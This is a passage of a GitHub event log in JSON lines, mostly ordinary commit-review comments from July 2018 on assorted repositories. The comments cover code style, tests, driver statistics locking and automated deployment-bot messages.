docs on federation (see intro in Advanced Federation guide)."}},"created_at":"2018-07-24T11:02:19Z"}
{"id":"8009422910","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29812589,"position":14,"line":14,"path":"test/utilitysplittertests.js","commit_id":"5662a8fe1a415192acb4d5b9050eaceb1e6d1372","created_at":"2018-07-24T11:02:21Z","updated_at":"2018-07-24T11:02:21Z","author_association":"NONE","body":"Then do `assert.equal(xx.toString(10), yy.toString(10))` and the error message will be readable."}},"created_at":"2018-07-24T11:02:21Z"}
{"id":"8009424036","type":"CommitCommentEvent","actor":{"login":"Meticulus"},"repo":{"name":"Meticulus/android_device_huawei_hi6250"},"payload":{"comment":{"id":29812590,"position":null,"line":null,"path":null,"commit_id":"ed6563e6fb5747fd0eedc9258aae37ec06891d05","created_at":"2018-07-24T11:02:37Z","updated_at":"2018-07-24T11:02:37Z","author_association":"OWNER","body":"Obviously not. :-1: "}},"created_at":"2018-07-24T11:02:37Z"}
{"id":"8009426997","type":"CommitCommentEvent","actor":{"login":"petergtz"},"repo":{"name":"cloudfoundry-incubator/bits-service-release"},"payload":{"comment":{"id":29812595,"position":6,"line":20,"path":"scripts/run-system-tests.sh","commit_id":"7fd23c56289e42fe821bb7d7619dd8e1bef8e3c1","created_at":"2018-07-24T11:03:15Z","updated_at":"2018-07-24T11:03:15Z","author_association":"MEMBER","body":"@eric-cartman @idev4u Wouldn't it be easier just to use `-e` in line 1?"}},"created_at":"2018-07-24T11:03:15Z"}
{"id":"8009429124","type":"CommitCommentEvent","actor":{"login":"Meticulus"},"repo":{"name":"Meticulus/android_device_huawei_hi6250"},"payload":{"comment":{"id":29812600,"position":null,"line":null,"path":null,"commit_id":"b2b2a08e89882315343cfa168e1cf50bd2f3f2c8","created_at":"2018-07-24T11:03:43Z","updated_at":"2018-07-24T11:03:43Z","author_association":"OWNER","body":"@4PERTURE Sorry but no."}},"created_at":"2018-07-24T11:03:43Z"}
{"id":"8009433163","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29812611,"position":145,"line":192,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T11:04:32Z","updated_at":"2018-07-24T11:04:32Z","author_association":"NONE","body":"I thought about doing that on get_stats but that would require to either introduce some locks or being the per core stats atomic.  Both of these have some penalty so I went with periodic update.  I will move this check out of the loop though - good point."}},"created_at":"2018-07-24T11:04:32Z"}
{"id":"8009435270","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29812615,"position":null,"line":null,"path":null,"commit_id":"a4f22825503d5e94907e06b974494a4b65454632","created_at":"2018-07-24T11:04:58Z","updated_at":"2018-07-24T11:04:58Z","author_association":"COLLABORATOR","body":"当てはまらない条件は全てreturnしているので、elseで囲う必要はないです。(石井)"}},"created_at":"2018-07-24T11:04:58Z"}
{"id":"8009439295","type":"CommitCommentEvent","actor":{"login":"naoki-yoshioka"},"repo":{"name":"naoki-yoshioka/pastel"},"payload":{"comment":{"id":29812621,"position":null,"line":null,"path":null,"commit_id":"c6ec7c94fc28ebdf94ddb8136e5b8980644833fc","created_at":"2018-07-24T11:05:51Z","updated_at":"2018-07-24T11:05:51Z","author_association":"OWNER","body":"Although \"bug-fix of #20\" is commented, there is no fix."}},"created_at":"2018-07-24T11:05:51Z"}
{"id":"8009441372","type":"CommitCommentEvent","actor":{"login":"liwc0329"},"repo":{"name":"kaazing/gateway"},"payload":{"comment":{"id":29812623,"position":26,"line":88,"path":"management/src/main/java/org/kaazing/gateway/management/gateway/GatewayManagementBeanImpl.java","commit_id":"0cc2aa97b46421eab642f09cc79097afec1d083a","created_at":"2018-07-24T11:06:18Z","updated_at":"2018-07-24T11:06:18Z","author_association":"NONE","body":"1"}},"created_at":"2018-07-24T11:06:18Z"}
{"id":"8009443365","type":"CommitCommentEvent","actor":{"login":"PieterPaulussen"},"repo":{"name":"EssentNovaTeam/account-financial-reporting"},"payload":{"comment":{"id":29812628,"position":68,"line":103,"path":"account_financial_report_webkit/models/account_static_balance.py","commit_id":"4abb38392cb234056181d956eed1b19c42d54e3e","created_at":"2018-07-24T11:06:45Z","updated_at":"2018-07-24T11:06:45Z","author_association":"NONE","body":"accounts=accounts"}},"created_at":"2018-07-24T11:06:45Z"}
{"id":"8009444213","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29812631,"position":null,"line":null,"path":null,"commit_id":"67fe28c992ec0a3c984b776ed82e1d300510a092","created_at":"2018-07-24T11:06:56Z","updated_at":"2018-07-24T11:06:56Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#pr-47](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#pr-47).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-47-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-24T11:06:56Z"}
{"id":"8009447340","type":"CommitCommentEvent","actor":{"login":"gsuberland"},"repo":{"name":"LordNoteworthy/al-khaser"},"payload":{"comment":{"id":29812633,"position":null,"line":null,"path":null,"commit_id":"8a68f1731af1aa4fc364e0ad0851f11ff32f280d","created_at":"2018-07-24T11:07:38Z","updated_at":"2018-07-24T11:07:38Z","author_association":"COLLABORATOR","body":"That's because it's a different hooking method. CE doesn't redirect GetProcAddress, it uses code-caves. We have other anti-hook tricks in the works that will detect code-caves."}},"created_at":"2018-07-24T11:07:38Z"}
{"id":"8009449997","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29812638,"position":null,"line":null,"path":null,"commit_id":"a1da977fdad66df15738e4e036482476e298a1ea","created_at":"2018-07-24T11:08:13Z","updated_at":"2018-07-24T11:08:13Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#pr-37](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#pr-37).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-37-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-24T11:08:13Z"}
{"id":"8009452580","type":"CommitCommentEvent","actor":{"login":"chinatsu"},"repo":{"name":"navikt/pdfgen"},"payload":{"comment":{"id":29812661,"position":22,"line":65,"path":"src/main/kotlin/no/nav/pdfgen/Bootstrap.kt","commit_id":"677bff3185fd243baad2705abd5c1cb8dc1b76ac","created_at":"2018-07-24T11:08:47Z","updated_at":"2018-07-24T11:08:47Z","author_association":"CONTRIBUTOR","body":"`options.param(0)` sjekkes ikke om den ikke er satt, fikk ikke helt til å sjekke det heller"}},"created_at":"2018-07-24T11:08:47Z"}
{"id":"8009454150","type":"CommitCommentEvent","actor":{"login":"ngochai4404"},"repo":{"name":"ngochai4404/note"},"payload":{"comment":{"id":29812663,"position":17,"line":17,"path":"app/src/main/java/com/hai/note/activity/base/BaseActivity.java","commit_id":"1812d4a15c2f3d6081b770904f24a7b76a722eb5","created_at":"2018-07-24T11:09:08Z","updated_at":"2018-07-24T11:09:08Z","author_association":"OWNER","body":"Dạ, hôm nay em kiểm tra mail thấy tin nhắn trong spam ạ\nĐể e sửa lại r update lại code anh ạ\nAnh có thể gửi lại cho em ảnh không ạ? Em không nhìn thấy hình ảnh a gửi ạ\nEm cảm ơn\n\n2018-07-11 14:32 GMT+07:00 namhv <notifications@github.com>:\n\n> Cái này để làm gì vậy?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngochai4404/note/commit/1812d4a15c2f3d6081b770904f24a7b76a722eb5#commitcomment-29667145>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASqHNz8gVTrII-hQgT6BfUWi2d_YkxZvks5uFan4gaJpZM4VKn_U>\n> .\n>\n"}},"created_at":"2018-07-24T11:09:08Z"}
{"id":"8009454137","type":"CommitCommentEvent","actor":{"login":"PieterPaulussen"},"repo":{"name":"EssentNovaTeam/account-financial-reporting"},"payload":{"comment":{"id":29812665,"position":188,"line":125,"path":"account_financial_report_webkit/report/common_balance_reports.py","commit_id":"4abb38392cb234056181d956eed1b19c42d54e3e","created_at":"2018-07-24T11:09:09Z","updated_at":"2018-07-24T11:09:09Z","author_association":"NONE","body":"Don't forget to remove this afterwards!"}},"created_at":"2018-07-24T11:09:09Z"}
{"id":"8009455443","type":"CommitCommentEvent","actor":{"login":"rm-rfasterisk"},"repo":{"name":"ATechnoHazard/fwbot"},"payload":{"comment":{"id":29812668,"position":null,"line":null,"path":null,"commit_id":"05928830f17a4dd6d313cf7634c81a68ed2d20e0","created_at":"2018-07-24T11:09:25Z","updated_at":"2018-07-24T11:09:25Z","author_association":"NONE","body":"bhery osum, bhery osum. sur, u iz bhery pru!\r\n"}},"created_at":"2018-07-24T11:09:25Z"}
{"id":"8009459331","type":"CommitCommentEvent","actor":{"login":"MikeBland"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":29812671,"position":null,"line":null,"path":null,"commit_id":"75bff32cc73c729eb3b42f33a00f2fb97c5f5bb4","created_at":"2018-07-24T11:10:17Z","updated_at":"2018-07-24T11:10:17Z","author_association":"NONE","body":"Seems a backward way of doing this since the Tx has 6 buttons, so use the same navigation as the 9X/9XR/9XR-PRO.\r\n"}},"created_at":"2018-07-24T11:10:17Z"}
{"id":"8009459701","type":"CommitCommentEvent","actor":{"login":"tioovioo"},"repo":{"name":"tioovioo/SpringCloud"},"payload":{"comment":{"id":29812672,"position":null,"line":null,"path":null,"commit_id":"56b1ebff71518265fca2b41b45aa2fe3fc513ea7","created_at":"2018-07-24T11:10:21Z","updated_at":"2018-07-24T11:10:21Z","author_association":"OWNER","body":"Write Less , Do More !"}},"created_at":"2018-07-24T11:10:21Z"}
{"id":"8009462086","type":"CommitCommentEvent","actor":{"login":"jesusp87"},"repo":{"name":"jesusp87/jp-random-tests"},"payload":{"comment":{"id":29812676,"position":19,"line":41,"path":"code-review/ProfileView.js","commit_id":"69df7db14740dbf04763882089049eb05a0b2b91","created_at":"2018-07-24T11:10:53Z","updated_at":"2018-07-24T11:10:53Z","author_association":"OWNER","body":"Maybe it would be better to convert these 'if' into a 'switch' ? So we could see all the cases clearer and if we grow in options, the 'switch' would be faster."}},"created_at":"2018-07-24T11:10:53Z"}
{"id":"8009462114","type":"CommitCommentEvent","actor":{"login":"PhilippWendler"},"repo":{"name":"sosy-lab/java-common-lib"},"payload":{"comment":{"id":29812677,"position":null,"line":null,"path":null,"commit_id":"859dc016d24ce92dc98d48ae118662d757cf6bf6","created_at":"2018-07-24T11:10:53Z","updated_at":"2018-07-24T11:10:53Z","author_association":"MEMBER","body":"Actually, most of the stuff below `lib/java` is not part of the classpath, only `runtime` and `test` are."}},"created_at":"2018-07-24T11:10:53Z"}
{"id":"8009464095","type":"CommitCommentEvent","actor":{"login":"the-bad-dream-01"},"repo":{"name":"the-bad-dream-01/codecamp"},"payload":{"comment":{"id":29812678,"position":null,"line":null,"path":null,"commit_id":"2e0068244895fb67950b844c9e3fc919022c10c1","created_at":"2018-07-24T11:11:20Z","updated_at":"2018-07-24T11:11:20Z","author_association":"OWNER","body":"s"}},"created_at":"2018-07-24T11:11:20Z"}
{"id":"8009467809","type":"CommitCommentEvent","actor":{"login":"govjess"},"repo":{"name":"MARKETProtocol/MARKET.js"},"payload":{"comment":{"id":29812684,"position":13,"line":44,"path":"src/contract_wrappers/MarketContractOraclizeWrapper.ts","commit_id":"f2414558e5df683ecd11ce6ffb2cb652737429d8","created_at":"2018-07-24T11:12:10Z","updated_at":"2018-07-24T11:12:10Z","author_association":"NONE","body":"<"}},"created_at":"2018-07-24T11:12:10Z"}
{"id":"8009477352","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29812710,"position":null,"line":null,"path":null,"commit_id":"9a52e51e0e176793040ee6b7088afb6a6f670a30","created_at":"2018-07-24T11:14:17Z","updated_at":"2018-07-24T11:14:17Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-358](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-358).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-358-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-24T11:14:17Z"}
{"id":"8009478853","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29812714,"position":null,"line":null,"path":null,"commit_id":"2d805d249e637d0fd6f37551c4a94c916e39f7aa","created_at":"2018-07-24T11:14:37Z","updated_at":"2018-07-24T11:14:37Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#ci-277](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#ci-277).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-277-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-24T11:14:37Z"}
{"id":"8009480128","type":"CommitCommentEvent","actor":{"login":"andrew-morrison"},"repo":{"name":"bodleian/medieval-mss"},"payload":{"comment":{"id":29812718,"position":null,"line":null,"path":null,"commit_id":"eba174397433f76c3ae765a38165073a67201540","created_at":"2018-07-24T11:14:53Z","updated_at":"2018-07-24T11:14:53Z","author_association":"CONTRIBUTOR","body":"@holfordm: You appear to have moved the _processing_ folder in your local copy inside the _collections_ folder, then committed and pushed that change."}},"created_at":"2018-07-24T11:14:53Z"}
{"id":"8009488975","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29812738,"position":31,"line":31,"path":"6-7.cpp","commit_id":"64586dde8d7fa55972bd8cb411022d320cc98d5b","created_at":"2018-07-24T11:16:50Z","updated_at":"2018-07-24T11:16:50Z","author_association":"COLLABORATOR","body":"case 12 もここにまとめちゃいましょう(石井)"}},"created_at":"2018-07-24T11:16:50Z"}
{"id":"8009490178","type":"CommitCommentEvent","actor":{"login":"rzr"},"repo":{"name":"fiskeben/bmp085"},"payload":{"comment":{"id":29812741,"position":null,"line":null,"path":null,"commit_id":"a964efa2a993d04e2a1b19e82288de094bde68a8","created_at":"2018-07-24T11:17:07Z","updated_at":"2018-07-24T11:17:07Z","author_association":"CONTRIBUTOR","body":"Thanks \\o/ https://www.npmjs.com/package/bmp085\r\nI am going to update https://github.com/rzr/mozilla-iot-generic-sensors-adapter/\r\n"}},"created_at":"2018-07-24T11:17:07Z"}
{"id":"8009511304","type":"CommitCommentEvent","actor":{"login":"samuelmalcav"},"repo":{"name":"smvperu/curriculum-vitae"},"payload":{"comment":{"id":29812777,"position":null,"line":null,"path":null,"commit_id":"35ab1911c3e46af75aa74bb8a275aaac56417527","created_at":"2018-07-24T11:21:49Z","updated_at":"2018-07-24T11:21:49Z","author_association":"CONTRIBUTOR","body":"by samuel malca"}},"created_at":"2018-07-24T11:21:49Z"}
{"id":"8009511824","type":"CommitCommentEvent","actor":{"login":"JakELips"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29812778,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T11:21:56Z","updated_at":"2018-07-24T11:21:56Z","author_association":"NONE","body":"Great project."}},"created_at":"2018-07-24T11:21:56Z"}
{"id":"8009516281","type":"CommitCommentEvent","actor":{"login":"emanuelmetal"},"repo":{"name":"makingsensetraining/DirectlyTraining"},"payload":{"comment":{"id":29812782,"position":64,"line":57,"path":"webapp/app/components/pages/ActionButtons/ActionButtons.jsx","commit_id":"b2fbe723d1baf1ce969bb09a20a0ac0c36cb0122","created_at":"2018-07-24T11:22:57Z","updated_at":"2018-07-24T11:22:57Z","author_association":"MEMBER","body":"@rootsco Feel free to open a PR with this changes if you have some time, I think this comment shall be done when the correspondant PR were opened."}},"created_at":"2018-07-24T11:22:57Z"}
{"id":"8009519668","type":"CommitCommentEvent","actor":{"login":"zhenglilei"},"repo":{"name":"Lab41/PySEAL"},"payload":{"comment":{"id":29812789,"position":5,"line":4,"path":"run-docker.sh","commit_id":"2eb45661eb3f112eaaba0fe8cfa180b9e575ec1d","created_at":"2018-07-24T11:23:41Z","updated_at":"2018-07-24T11:23:41Z","author_association":"NONE","body":"As in the build file, it is seal-save, here it should be also changed to \"seal-save\"."}},"created_at":"2018-07-24T11:23:41Z"}
{"id":"8009546462","type":"CommitCommentEvent","actor":{"login":"uesley"},"repo":{"name":"uesley/xpert"},"payload":{"comment":{"id":29812836,"position":5,"line":153,"path":"src/xPertCore/EtapaCore.java","commit_id":"44f5daa6f54136c7a6ee55e85ae83b59d60f7357","created_at":"2018-07-24T11:29:38Z","updated_at":"2018-07-24T11:29:38Z","author_association":"OWNER","body":"massa de mais..."}},"created_at":"2018-07-24T11:29:38Z"}
{"id":"8009549485","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29812842,"position":407,"line":531,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T11:30:15Z","updated_at":"2018-07-24T11:30:15Z","author_association":"NONE","body":"This is the same as above.  I plan to move this out of this loop but not collect stats from cores on get_stats call.\r\nIf you want me to do it that way then I can - but I will switch to atomics per lcore with atomic add and in the get_stats call atomic get.  Let me know if this is the decision."}},"created_at":"2018-07-24T11:30:15Z"}
{"id":"8009556918","type":"CommitCommentEvent","actor":{"login":"winni2k"},"repo":{"name":"kvg/dmpy"},"payload":{"comment":{"id":29812856,"position":48,"line":48,"path":"tests/test_unit/test_sge_integration.py","commit_id":"57630539089957873b61336d7808029ec6055f28","created_at":"2018-07-24T11:31:46Z","updated_at":"2018-07-24T11:31:46Z","author_association":"COLLABORATOR","body":"This assertion is maybe a bit too specific for a good test.  I bet this will break as soon as we twiddle the order of arguments supplied by qsub.  I might have gone for a `for` loop over all arguments I want to see in the recipe and check that each argument exists. For example:\r\n```python\r\nfor arg in ['-sync y', '-V', 'pe smp']:\r\n    assert arg in rule.recipe[1]\r\n```\r\nAlso, is there a typo in `pe smp`?"}},"created_at":"2018-07-24T11:31:46Z"}
{"id":"8009559529","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29812870,"position":43,"line":43,"path":"6-9.cpp","commit_id":"a62547aacce35c3363470a0b87a3612583e9d5bb","created_at":"2018-07-24T11:32:22Z","updated_at":"2018-07-24T11:32:22Z","author_association":"COLLABORATOR","body":"randomNumber とsecondArgumentが一致した場合にループを抜けてしまいます。(石井)"}},"created_at":"2018-07-24T11:32:22Z"}
{"id":"8009561126","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29812873,"position":null,"line":null,"path":null,"commit_id":"fac470014b4b97060a22c346aadfaf9c03b99ff2","created_at":"2018-07-24T11:32:45Z","updated_at":"2018-07-24T11:32:45Z","author_association":"MEMBER","body":"Area auras are removed in `RemoveFromWorld`, so shouldn't be."}},"created_at":"2018-07-24T11:32:45Z"}
{"id":"8009563248","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29812874,"position":4,"line":36,"path":"test/TestMain.hx","commit_id":"984d3efe29c2a6ae15d8d2188412f71ef8e13d79","created_at":"2018-07-24T11:33:13Z","updated_at":"2018-07-24T11:33:13Z","author_association":"MEMBER","body":"What's that about? :)"}},"created_at":"2018-07-24T11:33:13Z"}
{"id":"8009565808","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29812882,"position":26,"line":26,"path":"6-9.cpp","commit_id":"a62547aacce35c3363470a0b87a3612583e9d5bb","created_at":"2018-07-24T11:33:45Z","updated_at":"2018-07-24T11:33:45Z","author_association":"COLLABORATOR","body":"引数名をもうちょっとがんばって考えてほしいです。下限と上限というキーワードを使えば何とかなりそうです。(石井)"}},"created_at":"2018-07-24T11:33:45Z"}
{"id":"8009565910","type":"CommitCommentEvent","actor":{"login":"PeterHiroshi"},"repo":{"name":"DraughtsQTMaker/Draughts_QT_Team"},"payload":{"comment":{"id":29812883,"position":null,"line":null,"path":null,"commit_id":"6b2b3e337a28ec2ab6b324b150dd9917a050b52e","created_at":"2018-07-24T11:33:46Z","updated_at":"2018-07-24T11:33:46Z","author_association":"CONTRIBUTOR","body":"human/oppo surrender button 和 robot/me surrender button 的用法有所区别，千万不要点错！！！"}},"created_at":"2018-07-24T11:33:46Z"}
{"id":"8009566665","type":"CommitCommentEvent","actor":{"login":"binary1230"},"repo":{"name":"magfest/magwest2-site"},"payload":{"comment":{"id":29812884,"position":4,"line":4,"path":"site/content/bands/dokoe.md","commit_id":"11e32e03086c91e32a66636f21de05e0e34c8fa2","created_at":"2018-07-24T11:33:57Z","updated_at":"2018-07-24T11:33:57Z","author_association":"COLLABORATOR","body":"Argh woops, thanks\n\nOn Tue, Jul 24, 2018, 12:06 AM Daniel Evans <notifications@github.com>\nwrote:\n\n> 22/15/17 is not a valid date, this date causes a build error. Fixed and\n> pushed 😄\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/magfest/magwest2-site/commit/11e32e03086c91e32a66636f21de05e0e34c8fa2#commitcomment-29808612>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFKYyGTaTkcCT4QCYHSD4kRdvcTxiAanks5uJp0ygaJpZM4VcDNd>\n> .\n>\n"}},"created_at":"2018-07-24T11:33:57Z"}
{"id":"8009569060","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29812891,"position":null,"line":null,"path":null,"commit_id":"7a4ca34dfc29265c816841f6f677fdf586fa14c9","created_at":"2018-07-24T11:34:28Z","updated_at":"2018-07-24T11:34:28Z","author_association":"OWNER","body":"commit index"}},"created_at":"2018-07-24T11:34:28Z"}
{"id":"8009573184","type":"CommitCommentEvent","actor":{"login":"cweitkamp"},"repo":{"name":"cweitkamp/smarthome"},"payload":{"comment":{"id":29812894,"position":null,"line":null,"path":null,"commit_id":"20d811d7e635c9b4b917dd6e533ffe12aac128ba","created_at":"2018-07-24T11:35:20Z","updated_at":"2018-07-24T11:35:20Z","author_association":"OWNER","body":"Testversion (requires ESH build 281 or higher and / or OH2 build 1316 or higher): [org.eclipse.smarthome.binding.openweathermap-0.10.0-SNAPSHOT.jar.zip](https://github.com/cweitkamp/smarthome/files/2223410/org.eclipse.smarthome.binding.openweathermap-0.10.0-SNAPSHOT.jar.zip)"}},"created_at":"2018-07-24T11:35:20Z"}
{"id":"8009573213","type":"CommitCommentEvent","actor":{"login":"sotiris1905"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29812895,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T11:35:20Z","updated_at":"2018-07-24T11:35:20Z","author_association":"NONE","body":"i like this project,seam great"}},"created_at":"2018-07-24T11:35:20Z"}
{"id":"8009577093","type":"CommitCommentEvent","actor":{"login":"kargakis"},"repo":{"name":"jim-minter/azure-helm"},"payload":{"comment":{"id":29812902,"position":24,"line":161,"path":"pkg/addons/clean.go","commit_id":"38e1b54af5ca14dd07c5369163704a5e7a869667","created_at":"2018-07-24T11:36:12Z","updated_at":"2018-07-24T11:36:12Z","author_association":"COLLABORATOR","body":"Why is this true only for LoadBalancer services? Is `clusterIP` ignored for other types?"}},"created_at":"2018-07-24T11:36:12Z"}
{"id":"8009579727","type":"CommitCommentEvent","actor":{"login":"Keader"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29812907,"position":null,"line":null,"path":null,"commit_id":"fac470014b4b97060a22c346aadfaf9c03b99ff2","created_at":"2018-07-24T11:36:47Z","updated_at":"2018-07-24T11:36:47Z","author_association":"MEMBER","body":"😍 "}},"created_at":"2018-07-24T11:36:47Z"}
{"id":"8009583296","type":"CommitCommentEvent","actor":{"login":"ben-75"},"repo":{"name":"iotaledger/iri"},"payload":{"comment":{"id":29812915,"position":26,"line":120,"path":"src/main/java/com/iota/iri/service/tipselection/impl/TipSelectorImpl.java","commit_id":"841f484beda313bebb947f97f170a7186b0139e2","created_at":"2018-07-24T11:37:37Z","updated_at":"2018-07-24T11:37:37Z","author_association":"NONE","body":"It seems wrong to use an InvalidAlgorithmParameterException here. It's not a RuntimeException and the semantic of InvalidAlgorithmParameterException is not appropriate."}},"created_at":"2018-07-24T11:37:37Z"}
{"id":"8009588733","type":"CommitCommentEvent","actor":{"login":"SimonHeimberg"},"repo":{"name":"php-censor/php-censor"},"payload":{"comment":{"id":29812918,"position":5,"line":130,"path":"src/Builder.php","commit_id":"069026bc2d6f34bbf6b4853938a3f9d54f90eed9","created_at":"2018-07-24T11:38:46Z","updated_at":"2018-07-24T11:38:46Z","author_association":"CONTRIBUTOR","body":"With this change, the next checkis superflux (is_null and is_array). We should only use one.\r\nThe custom message below is clearer than the fatal failure because of an unmatching argument. But if setConfig() shall never be called with invalid data, the custom check should be removed."}},"created_at":"2018-07-24T11:38:46Z"}
{"id":"8009596657","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29812940,"position":54,"line":54,"path":"6-11.cpp","commit_id":"234929409951be9c653f5d9cfdd68f9f04f22887","created_at":"2018-07-24T11:40:31Z","updated_at":"2018-07-24T11:40:31Z","author_association":"COLLABORATOR","body":"switch文の中身が長くなっているので、関数として切り出してください。(石井)"}},"created_at":"2018-07-24T11:40:31Z"}
{"id":"8009597214","type":"CommitCommentEvent","actor":{"login":"shiqikai"},"repo":{"name":"jupp0r/prometheus-cpp"},"payload":{"comment":{"id":29812941,"position":null,"line":null,"path":null,"commit_id":"63a5c6100a2b6d50eb36b8b27e6cae4b7e047271","created_at":"2018-07-24T11:40:39Z","updated_at":"2018-07-24T11:40:39Z","author_association":"NONE","body":"Thanks ! you are so smart!\r\n牛逼!"}},"created_at":"2018-07-24T11:40:39Z"}
{"id":"8009597957","type":"CommitCommentEvent","actor":{"login":"codyek"},"repo":{"name":"codyek/token-profile"},"payload":{"comment":{"id":29812943,"position":null,"line":null,"path":null,"commit_id":"4551e642ec1229e70014c40a2e53594a04c5270d","created_at":"2018-07-24T11:40:49Z","updated_at":"2018-07-24T11:40:49Z","author_association":"OWNER","body":"update MMO token"}},"created_at":"2018-07-24T11:40:49Z"}
{"id":"8009598610","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29812945,"position":null,"line":null,"path":null,"commit_id":"c698e4a7d0611f8f851b7455e67eca318dc09242","created_at":"2018-07-24T11:40:57Z","updated_at":"2018-07-24T11:40:57Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-165](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-165).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-165-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-24T11:40:57Z"}
{"id":"8009598898","type":"CommitCommentEvent","actor":{"login":"ywx941018"},"repo":{"name":"nlohmann/json"},"payload":{"comment":{"id":29812947,"position":null,"line":null,"path":null,"commit_id":"14f01e1981763f988eb3d5aff23780519d2e7f57","created_at":"2018-07-24T11:41:01Z","updated_at":"2018-07-24T11:41:01Z","author_association":"NONE","body":"very good"}},"created_at":"2018-07-24T11:41:01Z"}
{"id":"8009604716","type":"CommitCommentEvent","actor":{"login":"HannahVMeyer"},"repo":{"name":"HannahVMeyer/limmbo"},"payload":{"comment":{"id":29812956,"position":null,"line":null,"path":null,"commit_id":"fba263be00c79868f47c0e1c286e758f33d13b4e","created_at":"2018-07-24T11:42:21Z","updated_at":"2018-07-24T11:42:21Z","author_association":"OWNER","body":"Thanks!\r\n\r\nI have updated the [overview plot](https://github.com/HannahVMeyer/limmbo/blob/new-sampling-method/performance/sampling.pdf) of the sampling performance after this change:\r\n1. much more uniform along the diagonal, off-diagonal samples close to diagonal oversampled compared to average.\r\n2. Unfortunately, set coverage allows needs more draws than random sampling."}},"created_at":"2018-07-24T11:42:21Z"}
{"id":"8009606493","type":"CommitCommentEvent","actor":{"login":"HadrienGardeur"},"repo":{"name":"readium/readium-2"},"payload":{"comment":{"id":29812975,"position":96,"line":76,"path":"locators/README.md","commit_id":"c186c44766fa3134e0dfbc226d3a715d7c284368","created_at":"2018-07-24T11:42:45Z","updated_at":"2018-07-24T11:42:45Z","author_association":"CONTRIBUTOR","body":"I don't like that part because it only applies to your progression in a book. For other use cases (search for instance), we won't render content to calculate that value."}},"created_at":"2018-07-24T11:42:45Z"}
